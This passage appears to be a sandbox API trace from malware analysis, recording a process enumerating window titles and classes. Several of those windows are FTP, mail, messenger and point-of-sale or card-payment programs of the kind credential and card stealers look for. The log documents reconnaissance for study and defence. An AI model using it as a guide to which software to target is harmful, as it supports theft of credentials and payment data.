returned 25 [0139.328] GetWindowTextW (in: hWnd=0x1036a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Force Which Baby") returned 16 [0139.329] GetClassNameW (in: hWnd=0x1036a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="force_which_Baby_cls") returned 20 [0139.329] GetWindowTextW (in: hWnd=0x10366, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Drive Law") returned 9 [0139.329] GetClassNameW (in: hWnd=0x10366, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DriveLawwindow") returned 14 [0139.329] GetWindowTextW (in: hWnd=0x10306, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="3Dftp") returned 5 [0139.329] GetClassNameW (in: hWnd=0x10306, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="3dftp") returned 5 [0139.329] GetWindowTextW (in: hWnd=0x10344, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Utg2") returned 4 [0139.329] GetClassNameW (in: hWnd=0x10344, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="utg2_cls") returned 8 [0139.330] GetWindowTextW (in: hWnd=0x10340, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Spgagentservice") returned 15 [0139.330] GetClassNameW (in: hWnd=0x10340, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="spgagentservicewindow") returned 21 [0139.330] GetWindowTextW (in: hWnd=0x102e6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Barca") returned 5 [0139.330] GetClassNameW (in: hWnd=0x102e6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="barca_class") returned 11 [0139.330] GetWindowTextW (in: hWnd=0x1038e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.330] GetClassNameW (in: hWnd=0x1038e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.330] GetWindowTextW (in: hWnd=0x10342, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Spcwin") returned 6 [0139.331] GetClassNameW (in: hWnd=0x10342, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="spcwin_wnd") returned 10 [0139.331] GetWindowTextW (in: hWnd=0x10338, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Fpos") returned 4 [0139.331] GetClassNameW (in: hWnd=0x10338, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="fpos") returned 4 [0139.331] GetWindowTextW (in: hWnd=0x10330, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Isspos") returned 6 [0139.331] GetClassNameW (in: hWnd=0x10330, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="issposwin") returned 9 [0139.331] GetWindowTextW (in: hWnd=0x1032e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Far") returned 3 [0139.331] GetClassNameW (in: hWnd=0x1032e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="farclass") returned 8 [0139.331] GetWindowTextW (in: hWnd=0x1032c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Edcsvr") returned 6 [0139.332] GetClassNameW (in: hWnd=0x1032c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="edcsvrwindow") returned 12 [0139.332] GetWindowTextW (in: hWnd=0x102e2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Coreftp") returned 7 [0139.332] GetClassNameW (in: hWnd=0x102e2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="coreftpclass") returned 12 [0139.332] GetWindowTextW (in: hWnd=0x1032a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Mxslipstream") returned 12 [0139.332] GetClassNameW (in: hWnd=0x1032a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="mxslipstream_cls") returned 16 [0139.332] GetWindowTextW (in: hWnd=0x10324, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Thunderbird") returned 11 [0139.333] GetClassNameW (in: hWnd=0x10324, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="thunderbird_app") returned 15 [0139.333] GetWindowTextW (in: hWnd=0x10322, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Aldelo") returned 6 [0139.333] GetClassNameW (in: hWnd=0x10322, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="aldelo_app") returned 10 [0139.333] GetWindowTextW (in: hWnd=0x10320, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Pidgin") returned 6 [0139.333] GetClassNameW (in: hWnd=0x10320, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="pidgin") returned 6 [0139.333] GetWindowTextW (in: hWnd=0x1031e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Outlook") returned 7 [0139.333] GetClassNameW (in: hWnd=0x1031e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="outlook_class") returned 13 [0139.334] GetWindowTextW (in: hWnd=0x10316, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Smartftp") returned 8 [0139.334] GetClassNameW (in: hWnd=0x10316, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="smartftp_wnd") returned 12 [0139.334] GetWindowTextW (in: hWnd=0x10308, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Webdrive") returned 8 [0139.334] GetClassNameW (in: hWnd=0x10308, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="webdrive_wnd") returned 12 [0139.334] GetWindowTextW (in: hWnd=0x10310, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Ccv_Server") returned 10 [0139.334] GetClassNameW (in: hWnd=0x10310, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ccv_server_wnd") returned 14 [0139.334] GetWindowTextW (in: hWnd=0x10314, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Creditservice") returned 13 [0139.335] GetClassNameW (in: hWnd=0x10314, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="creditserviceclass") returned 18 [0139.335] GetWindowTextW (in: hWnd=0x102f6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Flashfxp") returned 8 [0139.335] GetClassNameW (in: hWnd=0x102f6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="flashfxpwin") returned 11 [0139.335] GetWindowTextW (in: hWnd=0x10304, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Gmailnotifierpro") returned 16 [0139.335] GetClassNameW (in: hWnd=0x10304, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="gmailnotifierprocls") returned 19 [0139.336] GetWindowTextW (in: hWnd=0x10302, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Accupos") returned 7 [0139.336] GetClassNameW (in: hWnd=0x10302, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="accuposwindow") returned 13 [0139.336] GetWindowTextW (in: hWnd=0x10300, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Winscp") returned 6 [0139.336] GetClassNameW (in: hWnd=0x10300, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="winscp_win") returned 10 [0139.336] GetWindowTextW (in: hWnd=0x102fe, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Yahoomessenger") returned 14 [0139.337] GetClassNameW (in: hWnd=0x102fe, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="yahoomessenger_") returned 15 [0139.337] GetWindowTextW (in: hWnd=0x102fc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Whatsapp") returned 8 [0139.337] GetClassNameW (in: hWnd=0x102fc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="whatsapp_window") returned 15 [0139.337] GetWindowTextW (in: hWnd=0x102fa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Active-Charge") returned 13 [0139.337] GetClassNameW (in: hWnd=0x102fa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="active-chargeclass") returned 18 [0139.337] GetWindowTextW (in: hWnd=0x102da, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Operamail") returned 9 [0139.338] GetClassNameW (in: hWnd=0x102da, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="operamail_wnd") returned 13 [0139.338] GetWindowTextW (in: hWnd=0x102f4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Ncftp") returned 5 [0139.338] GetClassNameW (in: hWnd=0x102f4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ncftp_wnd") returned 9 [0139.339] GetWindowTextW (in: hWnd=0x102f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Bitkinex") returned 8 [0139.339] GetClassNameW (in: hWnd=0x102f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="bitkinex_win") returned 12 [0139.339] GetWindowTextW (in: hWnd=0x102f0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Absolutetelnet") returned 14 [0139.339] GetClassNameW (in: hWnd=0x102f0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="absolutetelnetcls") returned 17 [0139.339] GetWindowTextW (in: hWnd=0x102ee, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Foxmailincmail") returned 14 [0139.340] GetClassNameW (in: hWnd=0x102ee, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="foxmailincmailwin") returned 17 [0139.340] GetWindowTextW (in: hWnd=0x102ec, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Trillian") returned 8 [0139.340] GetClassNameW (in: hWnd=0x102ec, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="trillian_wnd") returned 12 [0139.340] GetWindowTextW (in: hWnd=0x102ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Filezilla") returned 9 [0139.340] GetClassNameW (in: hWnd=0x102ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="filezillawin") returned 12 [0139.341] GetWindowTextW (in: hWnd=0x102e8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Fling") returned 5 [0139.341] GetClassNameW (in: hWnd=0x102e8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="fling") returned 5 [0139.341] GetWindowTextW (in: hWnd=0x102e4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Centralcreditcard") returned 17 [0139.341] GetClassNameW (in: hWnd=0x102e4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="centralcreditcardclass") returned 22 [0139.341] GetWindowTextW (in: hWnd=0x102dc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Afr38") returned 5 [0139.341] GetClassNameW (in: hWnd=0x102dc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="afr38_window") returned 12 [0139.341] GetWindowTextW (in: hWnd=0x102de, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Alftp") returned 5 [0139.342] GetClassNameW (in: hWnd=0x102de, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="alftp_class") returned 11 [0139.342] GetWindowTextW (in: hWnd=0x102d4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Leechftp") returned 8 [0139.342] GetClassNameW (in: hWnd=0x102d4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="leechftpcls") returned 11 [0139.456] GetWindowTextW (in: hWnd=0x102d0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Scriptftp") returned 9 [0139.456] GetClassNameW (in: hWnd=0x102d0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="scriptftpapp") returned 12 [0139.456] GetWindowTextW (in: hWnd=0x102cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Icq") returned 3 [0139.457] GetClassNameW (in: hWnd=0x102cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="icq_app") returned 7 [0139.457] GetWindowTextW (in: hWnd=0x102ce, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Skype") returned 5 [0139.457] GetClassNameW (in: hWnd=0x102ce, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="skype_window") returned 12 [0139.457] GetWindowTextW (in: hWnd=0x102d2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Notepad") returned 7 [0139.457] GetClassNameW (in: hWnd=0x102d2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="notepad_") returned 8 [0139.458] GetWindowTextW (in: hWnd=0x20214, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.458] GetClassNameW (in: hWnd=0x20214, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0139.458] GetWindowTextW (in: hWnd=0x1026c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Story Police") returned 12 [0139.458] GetClassNameW (in: hWnd=0x1026c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Storypoliceapp") returned 14 [0139.459] GetWindowTextW (in: hWnd=0x1026a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Include Effect Seven") returned 20 [0139.459] GetClassNameW (in: hWnd=0x1026a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="include_effect_seven_") returned 21 [0139.459] GetWindowTextW (in: hWnd=0x10268, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Serve") returned 5 [0139.459] GetClassNameW (in: hWnd=0x10268, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="servecls") returned 8 [0139.459] GetWindowTextW (in: hWnd=0x10260, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Weapon Natural") returned 14 [0139.459] GetClassNameW (in: hWnd=0x10260, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="weapon_Natural_win") returned 18 [0139.460] GetWindowTextW (in: hWnd=0x10266, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Camera") returned 6 [0139.460] GetClassNameW (in: hWnd=0x10266, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Camerawindow") returned 12 [0139.460] GetWindowTextW (in: hWnd=0x10262, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Nothing Foreign") returned 15 [0139.461] GetClassNameW (in: hWnd=0x10262, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="nothing_Foreign_app") returned 19 [0139.461] GetWindowTextW (in: hWnd=0x10264, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Move") returned 4 [0139.461] GetClassNameW (in: hWnd=0x10264, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="movecls") returned 7 [0139.461] GetWindowTextW (in: hWnd=0x40200, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Arrive") returned 6 [0139.461] GetClassNameW (in: hWnd=0x40200, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="arrivewnd") returned 9 [0139.461] GetWindowTextW (in: hWnd=0x1025c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Throw Toward Purpose") returned 20 [0139.461] GetClassNameW (in: hWnd=0x1025c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="throwTowardPurposeclass") returned 23 [0139.462] GetWindowTextW (in: hWnd=0x10244, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Factor Western Forget") returned 21 [0139.462] GetClassNameW (in: hWnd=0x10244, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="factor_Western_forget_window") returned 28 [0139.462] GetWindowTextW (in: hWnd=0x1022e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Clear") returned 5 [0139.462] GetClassNameW (in: hWnd=0x1022e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Clear_app") returned 9 [0139.462] GetWindowTextW (in: hWnd=0x10222, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Watch") returned 5 [0139.462] GetClassNameW (in: hWnd=0x10222, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Watch") returned 5 [0139.462] GetWindowTextW (in: hWnd=0x10230, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Who South") returned 9 [0139.463] GetClassNameW (in: hWnd=0x10230, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="whosouthapp") returned 11 [0139.463] GetWindowTextW (in: hWnd=0x10226, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Raise Left Buy") returned 14 [0139.463] GetClassNameW (in: hWnd=0x10226, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="raiseLeftbuyclass") returned 17 [0139.463] GetWindowTextW (in: hWnd=0x10218, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Knowledge Sign") returned 14 [0139.464] GetClassNameW (in: hWnd=0x10218, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Knowledgesignwin") returned 16 [0139.464] GetWindowTextW (in: hWnd=0x1020e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Drop") returned 4 [0139.464] GetClassNameW (in: hWnd=0x1020e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Dropwindow") returned 10 [0139.464] GetWindowTextW (in: hWnd=0x1020c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="That But") returned 8 [0139.464] GetClassNameW (in: hWnd=0x1020c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="that_but_class") returned 14 [0139.464] GetWindowTextW (in: hWnd=0x10206, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Claim") returned 5 [0139.465] GetClassNameW (in: hWnd=0x10206, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="claim_wnd") returned 9 [0139.465] GetWindowTextW (in: hWnd=0x10204, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Quite Do") returned 8 [0139.465] GetClassNameW (in: hWnd=0x10204, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Quite_Do_class") returned 14 [0139.465] GetWindowTextW (in: hWnd=0x30122, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.465] GetClassNameW (in: hWnd=0x30122, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.466] GetWindowTextW (in: hWnd=0x30036, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.466] GetClassNameW (in: hWnd=0x30036, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.466] GetWindowTextW (in: hWnd=0x3003e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.466] GetClassNameW (in: hWnd=0x3003e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.466] GetWindowTextW (in: hWnd=0x30070, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.466] GetClassNameW (in: hWnd=0x30070, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.467] GetWindowTextW (in: hWnd=0x201e0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0139.467] GetClassNameW (in: hWnd=0x201e0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0139.467] GetWindowTextW (in: hWnd=0x401f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.467] GetClassNameW (in: hWnd=0x401f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.467] GetWindowTextW (in: hWnd=0x30288, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.467] GetClassNameW (in: hWnd=0x30288, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.468] GetWindowTextW (in: hWnd=0x30126, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0139.468] GetClassNameW (in: hWnd=0x30126, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IEFrame") returned 7 [0139.468] GetWindowTextW (in: hWnd=0x2012c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.468] GetClassNameW (in: hWnd=0x2012c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0139.468] GetWindowTextW (in: hWnd=0x20084, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.468] GetClassNameW (in: hWnd=0x20084, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0139.468] GetWindowTextW (in: hWnd=0x301fe, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.469] GetClassNameW (in: hWnd=0x301fe, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.469] GetWindowTextW (in: hWnd=0x201fa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.469] GetClassNameW (in: hWnd=0x201fa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.469] GetWindowTextW (in: hWnd=0x101be, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.469] GetClassNameW (in: hWnd=0x101be, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ATL:00007FFB1C177080") returned 20 [0139.469] GetWindowTextW (in: hWnd=0x101b8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.469] GetClassNameW (in: hWnd=0x101b8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.469] GetWindowTextW (in: hWnd=0x101aa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Battery Meter") returned 13 [0139.470] GetClassNameW (in: hWnd=0x101aa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="SystemTray_Main") returned 15 [0139.470] GetWindowTextW (in: hWnd=0x101a6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.470] GetClassNameW (in: hWnd=0x101a6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.470] GetWindowTextW (in: hWnd=0x101a4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0139.470] GetClassNameW (in: hWnd=0x101a4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0139.471] GetWindowTextW (in: hWnd=0x1018e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Task Host Window") returned 16 [0139.471] GetClassNameW (in: hWnd=0x1018e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0139.471] GetWindowTextW (in: hWnd=0x10110, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.471] GetClassNameW (in: hWnd=0x10110, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.471] GetWindowTextW (in: hWnd=0x10118, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.472] GetClassNameW (in: hWnd=0x10118, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TabletModeCoverWindow") returned 21 [0139.472] GetWindowTextW (in: hWnd=0x20152, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.472] GetClassNameW (in: hWnd=0x20152, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.472] GetWindowTextW (in: hWnd=0x1019a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.472] GetClassNameW (in: hWnd=0x1019a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.472] GetWindowTextW (in: hWnd=0x10116, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.473] GetClassNameW (in: hWnd=0x10116, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0139.473] GetWindowTextW (in: hWnd=0x1010e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.473] GetClassNameW (in: hWnd=0x1010e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0139.473] GetWindowTextW (in: hWnd=0x100f4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.473] GetClassNameW (in: hWnd=0x100f4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.474] GetWindowTextW (in: hWnd=0x100f0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Windows Push Notifications Platform") returned 35 [0139.474] GetClassNameW (in: hWnd=0x100f0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0139.474] GetWindowTextW (in: hWnd=0x100ee, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0139.474] GetClassNameW (in: hWnd=0x100ee, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0139.474] GetWindowTextW (in: hWnd=0x100ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.475] GetClassNameW (in: hWnd=0x100ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0139.475] GetWindowTextW (in: hWnd=0x100e6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.475] GetClassNameW (in: hWnd=0x100e6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.475] GetWindowTextW (in: hWnd=0x100e4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.475] GetClassNameW (in: hWnd=0x100e4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.476] GetWindowTextW (in: hWnd=0x200da, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.476] GetClassNameW (in: hWnd=0x200da, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.476] GetWindowTextW (in: hWnd=0x100c0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.476] GetClassNameW (in: hWnd=0x100c0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.476] GetWindowTextW (in: hWnd=0x702b8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.477] GetClassNameW (in: hWnd=0x702b8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0139.477] GetWindowTextW (in: hWnd=0x20040, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MS_WebcheckMonitor") returned 18 [0139.477] GetClassNameW (in: hWnd=0x20040, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0139.477] GetWindowTextW (in: hWnd=0x2001c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="BluetoothNotificationAreaIconWindowClass") returned 40 [0139.477] GetClassNameW (in: hWnd=0x2001c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0139.477] GetWindowTextW (in: hWnd=0x20030, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Windows Shell Experience Host") returned 29 [0139.478] GetClassNameW (in: hWnd=0x20030, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0139.482] GetWindowTextW (in: hWnd=0x2002e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.482] GetClassNameW (in: hWnd=0x2002e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="PNIHiddenWnd") returned 12 [0139.482] GetWindowTextW (in: hWnd=0x40038, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.482] GetClassNameW (in: hWnd=0x40038, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.482] GetWindowTextW (in: hWnd=0x101cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.483] GetClassNameW (in: hWnd=0x101cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.483] GetWindowTextW (in: hWnd=0x101c8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.483] GetClassNameW (in: hWnd=0x101c8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.484] GetWindowTextW (in: hWnd=0x100ac, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.484] GetClassNameW (in: hWnd=0x100ac, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0139.484] GetWindowTextW (in: hWnd=0x10078, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.484] GetClassNameW (in: hWnd=0x10078, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0139.485] GetWindowTextW (in: hWnd=0x10074, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.485] GetClassNameW (in: 